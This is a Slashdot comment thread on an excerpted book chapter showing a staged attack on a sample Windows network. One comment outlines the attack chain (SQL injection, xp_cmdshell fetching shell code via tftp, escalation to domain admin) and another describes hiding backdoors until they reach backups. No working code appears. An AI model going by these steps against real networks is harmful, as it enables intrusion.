Anatomy of a Hack 98
Tiberius_Fel writes "Informit.com is running an extensive article about the anatomy of a hack against a sample network. It's an excerpt from a book titled Protect Your Windows Network: From Perimeter to Data. Even though it makes references to Windows, the techniques can be applied to other operating systems fairly easily." From the article: "Although attacking networks can be fun and informative--not to mention illegal if you do not have all the proper permissions--the fact remains that the vast majority of us do not need to know how to do so. Frankly, becoming a good penetration tester (pen tester) takes more than a week-long class. It takes commitment, dedication, intuition, and technical savvy, not to mention a blatant disregard for the rules and the right way to do things."
How to protect your Windows Network (Score:4, Funny)
Re:How to protect your Windows Network (Score:1)
Oh noes!! (Score:5, Funny)
For Some, it just isn't worth it. (Score:5, Insightful)
But that's what America is for. They need something, but don't have the time to do it. So you learn how to provide for their need, and sell it to them.
Re:For Some, it just isn't worth it. (Score:2, Informative)
While working for a fortune 500 company who will remain anonymous, I "handled" security and disaster recovery for the Unix team, after September 11th, I had a new title, was flying to the sunguard site in phili every 3 months for testing and had close to an unlimited budget to make sure we where safe from hackers, terrorists, could handle a major disaster etc..
It's very unfortunate that companies don't see the need for security and disaster recovery (which by the way go hand in
Re:For Some, it just isn't worth it. (Score:4, Interesting)
Using the few thousand business and government networks I've seen over many years, about 99% of them could be cracked very quickly by anyone with half a clue. What's more, in the majority of cases, the technical people involved (either in-house or consultants) pretty much all knew that.
It may take more than a week to become a good pen tester because that involves a more comprehensive look at finding ALL the vulnerabilities and providing priorities and instructions on fixing them, but it sure doesn't take that long to learn enough to crack most network security.
The most common network used to be completely un-hardened hosts running multiple insecure applications on unsegmented networks with multiple unmonitored internet connections.
About the only improvement in the "average" network nowadays is that a firewall or at least NAT device is generally found on the internet facing edges of that insecure network and not much more.
Sure, I've worked for large ecommerce companies where we had better security than most banks (at least according to our regular third-party security auditors), but the vast majority of networks out there are either small to medium businesses run by managers with no clue and less inclination to spend money on security, or large companies and government agencies where no one knows what's going on enough to close all the gaps.
Especially government agencies. A friend worked as a security consultant for a cabinet level agency that ran for years with all the firewalls in simple routing mode because one of the high level bureacrats decided it simplified things (you know, no pesky security in the way) and their IDS would be good enough security by itself. If you've seen most government contracted IDS, you know how much of a joke that is.
It's routine at some of the agencies I did consulting work for to have all the employees in the office using the same username and password. Of course, the password being "password" made it easy for them all to remember and happy to give it out to any outside who they thought might need it.
Just this last saturday I listened to someone in the park on their mobile phone tell their customer that their company email password was "password" so that the customer could check their email for a document they wanted.
Now with widespread unsecured wireless network use showing up all over the place..... ahhhh... the lack of security is too much to contemplate! At least you used to have to be able to somewhat guess an IP range if you wanted to target a specific office. Now people can generally just park nearby and watch all the packets go past.
hey beavis! (Score:5, Funny)
Re:hey beavis! (Score:1)
Already Slashdotted, but I'm mirroring it here: (Score:1, Informative)
Re:Already Slashdotted, but I'm mirroring it here: (Score:1)
Re:Already Slashdotted, but I'm mirroring it here: (Score:2)
Re:Already Slashdotted, but I'm mirroring it here: (Score:3, Informative)
Please don't download any of the MP3 files you find there.
Note to Newbies, On the whole don't trust any mirror you find on slashdot that's not somebody like Mirrordot, Google, or the like. You may find yourself at goatse . cx
CYA (Score:2, Interesting)
Re:Performance Anxiety (Score:4, Funny)
favorite program for network security testing (Score:2, Insightful)
Re:favorite program for network security testing (Score:1)
They did not use any vulnerabilities, certainly not anything that an outside scan by nessus would have picked up.
Jason
Raising the bar (Score:5, Informative)
A lot of people will post on this story about how weak Windows is, or how great OpenBSD is, or whatever.
The keys to secure computing are
The use of multiple layers is crucial. Never depend on just a firewall, encrypted transmissions, or just on password protection. Never depend on your vendor to secure your data - it's your data, not your vendor's. Read your EULA, and you'll note how little they care.
Re:Raising the bar (Score:3, Insightful)
Also remember that social engineering can be used to penetrate networks.
Re:Raising the bar (Score:1)
4. Not having stupid users
Re:Raising the bar (Score:1)
Make sure whatever users that have a poterntial to be stupid can't screw up the entire system.
Re:Raising the bar (Score:2)
Re:Raising the bar (Score:2)
Re:Raising the bar (Score:2)
For each potential attacker class, and for every attack vector open to that class.
Some avenues of attack are more expensive or more difficult than others, and that depends on the class the attacker fits. Governments can do things that script kiddeez can't afford, while script kiddeez (for example) don't have to get a court order to try.
Also, it's not necessary for attackers to know a priori that compromising your systems will b
Difference between hacking and cracking... (Score:5, Insightful)
Re:Difference between hacking and cracking... (Score:1)
Hey, these are
we lost that battle in the mainstream media... (Score:1)
Re:Difference between hacking and cracking... (Score:3, Interesting)
To crack a system, one needs to find a hole the developers missed, without access to source. This can take insight and engineering skills on par with the designers, if missapplied. This is why so many hunt for vunrabilities and then release security notices, leaving it to the kiddies to craft the crack.
In the virus world, the same applies. The SQL injection worm was an awesomely crafted HTTP packet,
Re:Difference between hacking and cracking... (Score:1)
Or in many cases that i've seen, one only has to find a hole that the developers _hoped_ everyone would miss..
Re:Difference between hacking and cracking... (Score:2, Interesting)
Re:Difference between hacking and cracking... (Score:2)
At least that is what "cracking" used to mean before ESR thought he could use it as substitute for "breaking into computer systems".
Oversimplification. (Score:2)
ACs.... (Score:1)
Just like the movie Face Off (Score:2)
Re:Just like the movie Face Off (Score:1)
Error parsing construct.. (Score:2, Flamebait)
Who in his fucking right mind would put Windows boxes at the edge of his network?! If you must use it, at least use a proper OS for babysitting.
Re:Error parsing construct.. (Score:3, Interesting)
<sigh>
You may not have R'd TFA, but if you had, you'd notice that the techniques they illustrate to gain increasing and ultimately complete access to the network aren't particularly Windows-centric. The attack starts with a SQL injection vulnerability, for example, which is just as possible on a fully patched LAMP box if it's carelessly set up. The tools and specifics might be different on another system, but don't kid yourself that running non-MS machines at the edge of your networks is some kind o
Error parsing "panacea" (Score:3, Informative)
Network security in general, like another poster already commented, is about risk management. You'll NEVER be 100% secure - this doesn't mean that OS with the worst security track record in history is good enough. The idea is to get yourself to a comfortable level of paranoia vs functionality.
After watching Code Red, Blaster, Slammer, Sasser, etc, etc, etc run
It's the administrator you want, not Microsoft (Score:2)
The thing is, I think you guys are confusing "Windows machine" with "naively configured machine". I'll concede in advance that there is a high correlation. ;-)
You seem to be extrapolating from the fact that Sasser and friends were a widespread pain in the ass that Windows sucks. The latter may be true, but the former doesn't imply it. I got the feeling (just from reading the reports at the time, nothing fancy) that those worms mostly spread through stupidly configured home-user systems, not professionally
Windows networks (Score:1)
Article has a good page on cleaning systems (Score:5, Interesting)
What he doesn't really go into his how to build your production systems in a way that *ASSUMES* you're going to get attacked, maintains a clean environment for developing them in, and gives you the tools to rebuild rapidly from trustable versions. On the other hand, he does show how his example's victim's system was thoroughly broken into, getting from the production system to the development system, because it really *is* hard to do a good job of separating them adequately in a real environment, so even if you think you have a clean-room, you might not.
Re:Article has a good page on cleaning systems (Score:3, Informative)
All of my backups end in
Ah, simplicity of well thought out security. (Concerning backups, anyways.)
Shameless plug follows
A bit ago, I accidently nuked my home dir, so I made myself a backup script that scans $HOME for ".nobackup" files, and then archives everything but those directories containing those (I really don't need three copies of the kernel source in my backups, you know?).
Re:Article has a good page on cleaning systems (Score:5, Insightful)
If you were a hacker, and had just broken into someone's computer/network, would you start playing around and messing things up as soon as you got in?
Hell no. Only a moron would do that. You would (very quietly) install another backdoor or two, to make sure you can still get in, and then you'd wait five or six months, maybe a year or so, and ~then~ start causing trouble.
If you start making a mess right away, there's a good chance you'll get detected, and they'll do something about it to lock you out, maybe even going back to those backups and restoring them. That's no good.
On the other hand, if you wait, then by the time you start causing noticeable damage, they've already made new backups several times. With your exploits already in them. So they can restore the backups, and you can log right back in. The only way to get uncompromized backups will to use very old ones, from before you got in in the first place.
Patience is a virtue, in hacking just as in everything else.
Re:Article has a good page on cleaning systems (Score:1)
Look up , yeah right now..... that plane you see up there is carrying the point you missed !
How do you _know_ that the files weren't compromised before you zipped and encrypted them ?
Still think that's well thought out security ?
Re:Article has a good page on cleaning systems (Score:2)
I keep backups for a year and a half.
You know, minimum.
You can with Debian. (Score:3, Interesting)
Then you can mount the infected drive and validate the checksums against the packages available on the web.
This will not tell you anything about your data, but none of your data should be executable anyway, right?
The same goes for Red Hat or any other distribution that has checksums for both packages and files contained within those packages.
You can even completely re-install the kernel on a Debian system in this fashi
That's only a beginning. (Score:3, Interesting)
Actually, it will. (Score:2)
Yep. And those are the ones that would be replaced by a rootkit.
It doesn't have to. Those should be easy to check manually.
You DO know what accounts are necessary on your systems, right?
Why would there be any apps i
Re:Actually, it will. (Score:2)
And where are the package content checksumss kept? That's right, on your compromised system. I'm not even sure debian mandates MD5 checkums on all it's pacakge files yet.
Also there are more than
No assumptions necessary. (Score:2)
No. They're on the web site of the distribution that you used.
You compare the checksum of the package on your system with the checksum listed on the website.
You DO know what a checksum is, right?
Mandates or not, they are there.
Re:No assumptions necessary. (Score:2)
Let's stick to debian instead of pretending that all distributiuons are the same (although, AFAIK, no distributions allows what you claim they all do).
So, with debian, you can boot into knoppix. There is no general tool to say "I'm booted into knoppix, please verify /mnt/foo which is a debian installation with wesite bar using gpg key XYZ".
So, what can you do ... you can have a trusted version of debsig-verify, and a trusted version o
I'm a sysadmin. I rock. (Score:2)
Unlike certain Windows-centric individuals, I am not limited by the presence or absence of a tool specifically written to perform a function. I can script my own.
That is because I rock.
Attend, Grasshopper, and I will provide you illumination upon your path to True SysAdmin-hood.
Argue for your limitations, and the
Re:No assumptions necessary. (Score:2)
Actual production systems are typically much more complex than a raw Debian installation. It takes a *lot* of discipline to run a good configuration management environment at all, something that far too many companies with web sites don't do well, much less to run it in a way that gives you a trusted base for every application on your system.
You're probably not just going to have raw Debian and some data files. There'll be databases (typically O
Actually, there is. (Score:2)
Sure there is. When I say 2+2=4 and someone else is saying it's 6, then condescending is spot on.
No, they are not.
They have the same BASIC system and then they have whatever specifics needed for that app.
If I can validate everything except that app, then it is just a matter of re-installing that app. And that is the issue.
Glad they told me it was immoral to (cr|h)ack... (Score:2, Interesting)
I wouldn't have figured that out without them. From what I understand, laws describe what is legal, and individuals decide what is moral. Then again, maybe psycopaths need to be told...
Correction: (Score:1)
But yes, voluntary "pen testing" is probably often helpful. perhaps crackers could masquerade as white hats (company's POV, hactivists go under crackers in this example) if something screws up... but often companies won't even patch holes when they are pointed out (sorry, no source).
Old, old news... (Score:3, Informative)
http://www.microsoft.com/technet/technetmag/issue
Anatomy of a Hack... (Score:2, Funny)
No new news here (Score:5, Informative)
1. Do a WHOIS lookup of the IP range the network is on.
2. Search newsgroups for previous network internals that the SA has posted somewhere.
3. Do a port scan and fingerprint.
4. If there is a vulnerable service running, use a common exploit.
5. A quick description of how sql injection attack works on a web-application login.
6. Use xp_cmdshell on MS-SQL to download remote shell code via tftp.
7. Once somone has the sql server under control, use the poorly configured internal network to become domain admin.
Somone needs to put together a description on how a "social engineering" penetration test should be done objectivly. If there is one out there please let me know. =P
Re:No new news here (Score:1, Insightful)
2. Connect with VPN/dialup access.
3. Exploit local root hole
Simple!
Re:No new news here (Score:3, Informative)
Just finished the book, well worth the fairly short read. All non-true stories but are based in a realistic setting. Gets mi
Re:No new news here (Score:1)
Kevin Mitnick [mitnicksecurity.com] has written some interesting books that cover social engineering attacks extensively. More info here [amazon.com] and here [amazon.com]. They are a must read for anyone working in security.
Sad to see (Score:5, Insightful)
I though it was supposed to be a hacker forum
Ah so, Jedis do build their own light sabers (Score:2, Funny)
Ah so, it is true then, Jedis do build their own light sabers. [howstuffworks.com]
Disclaimer: I've seen this link on
strange definitions of warez, xss, etc. (Score:5, Interesting)
The metodology used is not extraordinary: setting up a purposedly insecure network then hacking (sic) it themselves using the known holes is kind of cheesy. It helps to show how it works, but I prefer the honeynet approach: setting up boxes with known (or not) security holes, then analysing how a real intruder creates havoc.
Then there's some strange (re)definition of words.
For example, straight from TFA:
There are several techniques for getting our tools (often called "warez") onto the database server.
Then, as a side note:
Warez is a hacker/attacker colloquialism. It comes from the term "software," but is now used varyingly to mean either "attack tools" or "bootlegged software." In this chapter, we use it in the former context.
I think it's the first time I see the term "warez" used to describe "attack tools" (sic). I used to live in ancient times where "warez" weren't yet called "warez", then "warez" became "warez". Now what? "warez" aren't "warez" anymore? As it changed? (then a great many online dictionaries definition should be updated btw.).
The definition of XSS is also interesting:
In Figure 2-5, we see that not only do we get logged on, but the application also displayed the fake username we sent it on the home page. This latter artifact is actually a separate type of vulnerability known as a cross-site scripting (XSS) vulnerability, where the user input is echoed directly to the screen without sanitizing it first. We will not use it in the following attack, but it is interesting to note that it is there.
This definition of XSS is wrong: it's not because we see what was typed that the input weren't sanitized (sic). And it's certainly not because we see what was entered that this could lead to code being executed on another user's computer. Moreover I find the last sentence of this paragraph misleading: We will not use it in the following attack, but it is interesting to note that is is there. Of course they're not using it: they're "hacking" the server(s), not joe random visitor's box.
Then there are quite a lot half-truth, that can also be misleading:
A fully compromised system cannot be trusted to tell you the truth. Even virus scanners must at some level rely on the system to not lie to them. If they ask whether a particular file is present, the attacker may simply have a tool in place that lies about it.
If by "fully compromised" it means that the BIOS has been flashed and now lies about the files it reports, I then more or less agree. However such a tool is improbable (not enough room in the BIOS memory and not all BIOS can be flashed at will). So by "fully compromised" that's probably not what they meant. How would then an attacker lie when booting from a CD and running the scan from the CD? Or when hooking the compromised HD as a second HD on a clean system? It's not like everybody run their virus/trojans/rootkits scanners from the suspicious host.
Then at the end of TFLA (the 'L' stands for "Long") they explain, in a very windowish style, how to recover from a "hack": reinstall everything, because there's nothing you can trust (besides Windows's installation medium?)
So is it about the anatomy of a "hack" or how to recover from a "hack"? Both? Then why not a single word about how to configure an IDS?
Speaking of IDS, from TFA: Once we took over an entire network through an intrusion detection system.
WTF? I'm not sure if by their definition Snort qualifies as an IDS, but I run Snort in a passive way: no IP, not a single packet emitting from the box, etc. If an IDS becomes an entry point for intruders, then it's not an IDS but an IAS: Intrusion Automation System
The article could be summarized like this (like others already pointed out i
the key: how stuff works... (Score:2)
understanding something completely is the best way to break it, compromise it, protect it. you must also have some creativity and/or intuition.
just some thoughts.
eric
rootkit implied by "fully compromised system" (Score:2)
Re:strange definitions of warez, xss, etc. (Score:3, Insightful)
Remember, though, that by even knowing that the topic of security exists, you're ahead of 80% of the crowd. Firewall? 90%. What are ports and sockets? 95%. SQL Injection? Cross-site scripting? Packet rebuilding with Scapy? Memory manipulation? Bus mastering? Whoa.
If anything, I have noticed m
Re:strange definitions of warez, xss, etc. (Score:1)
WTF? I'm not sure if by their definition Snort qualifies as an IDS, but I run Snort in a passive way: no IP, not a single packet emitting from the box, etc. If an IDS becomes an entry point for intruders, then it's not an IDS but an IAS: Intrusion Automation System
Interestingly enough, there have been vulnerabilities in Snort that actually did allow one to compromise it. Seems impossible given that Sn
Any comments on this? (Score:1)
Naturally, many other ports can be open, particularly if the target system is not a Windows system. However, these are the ones we look for in this chapter.
Wasn't windoze the OS with stupid, wide-range, unexplainably open ports? Any volunteers to slap the author senseless?
Pathetic (Score:2, Insightful)
They may aswell have written an article on how to crack a system if somebody sends you the SA password... pathetic!
Relies on injection (Score:1)
PwnSauce (Score:1)